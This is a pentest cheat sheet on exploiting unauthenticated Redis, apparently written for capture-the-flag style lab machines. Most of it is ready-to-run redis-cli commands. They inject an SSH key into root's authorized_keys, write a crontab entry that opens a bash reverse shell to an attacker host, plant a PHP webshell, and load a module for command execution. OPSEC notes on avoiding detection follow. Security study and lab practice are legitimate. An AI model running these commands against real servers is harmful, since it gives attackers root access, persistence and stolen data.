Redis Exploitation
#Overview
Redis is an in-memory data store that, in its default configuration, listens on port 6379 without authentication. Unauthenticated Redis access allows attackers to read all stored data, write files to disk (including SSH keys, crontabs, and web shells), and in some cases load custom modules for direct remote code execution.
#Prerequisites
- redis-cli (or netcat/ncat for raw Redis protocol)
- redis-rogue-server or redis-rogue-getshell for module-based RCE
#Detection & Enumeration
nmap -p 6379 --script redis-info <IP> # Redis version and info
redis-cli -h <IP> ping # Check if unauthenticated
redis-cli -h <IP> INFO # Full server info
redis-cli -h <IP> CONFIG GET * # Dump Redis configuration
redis-cli -h <IP> KEYS '*' # List all keys
redis-cli -h <IP> CLIENT LIST # List connected clients
BASH
#Exploitation / Execution
#SSH Key Injection (Most Reliable)
Generate SSH key pair on attacker machine, then inject public key into target's authorized_keys:
ssh-keygen -t rsa -C "redis@backdoor" -f redis_key # Generate key pair
(echo -e "\n\n"; cat redis_key.pub; echo -e "\n\n") > key.txt # Format with newlines
redis-cli -h <IP> CONFIG SET dir /root/.ssh # Set Redis working dir to .ssh
redis-cli -h <IP> CONFIG SET dbfilename authorized_keys # Set output filename
cat key.txt | redis-cli -h <IP> -x SET crack # Load key as Redis value
redis-cli -h <IP> SAVE # Write to disk
ssh -i redis_key root@<IP> # SSH in
BASH
If .ssh directory doesn't exist, try /home/<user>/.ssh or /var/lib/redis/.ssh.
#Crontab Injection
redis-cli -h <IP> CONFIG SET dir /var/spool/cron/crontabs # For Debian/Ubuntu
redis-cli -h <IP> SET crack "\n\n*/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'\n\n"
redis-cli -h <IP> CONFIG SET dbfilename root # Write to root's crontab
redis-cli -h <IP> SAVE
BASH
Note: This overrides existing crontab files and is destructive.
#Webshell via Redis
redis-cli -h <IP> CONFIG SET dir /var/www/html # Set dir to web root
redis-cli -h <IP> CONFIG SET dbfilename shell.php # Output file
redis-cli -h <IP> SET payload "<?php system(\$_GET['cmd']); ?>" # PHP webshell
redis-cli -h <IP> SAVE
curl http://<IP>/shell.php?cmd=id
BASH
#Module Loading for RCE
For Redis 4.x+, upload a compiled Redis module:
git clone https://github.com/n0b0dayCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand && make
redis-cli -h <IP> MODULE LOAD /path/to/module.so <cmd> # Execute arbitrary command
BASH
Alternative: Use redis-rogue-server.py for automated module-based RCE.
#Common Pitfalls
- Warning: Config changes persist and may break the Redis instance -- reset config before leaving:
CONFIG SET dir /var/lib/redis - Warning: The .ssh directory must exist on the target; if it doesn't, create it first (if you have other access) or try different paths
- Warning: Crontab injection clobbers existing crontab; it is destructive
#OPSEC Considerations
- Shield: Redis SAVE command creates a DB dump file that may trigger file integrity monitoring
- Shield: New SSH keys in authorized_keys are easily spotted during audits
- Shield: Unexpected Redis config changes leave evidence in Redis logs
#Post-Exploitation Value
- Direct root access via SSH if root is running Redis
- All stored Redis data (often contains session tokens, cached credentials, API keys)
- Persistent access through SSH key or crontab
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| redis-cli | Built-in with redis-tools package |
| redis-rogue-server | https://github.com/n0b0dayCN/RedisModules-ExecuteCommand |
#Source Machines
- Broker (Hard, Linux) - Redis unauthenticated access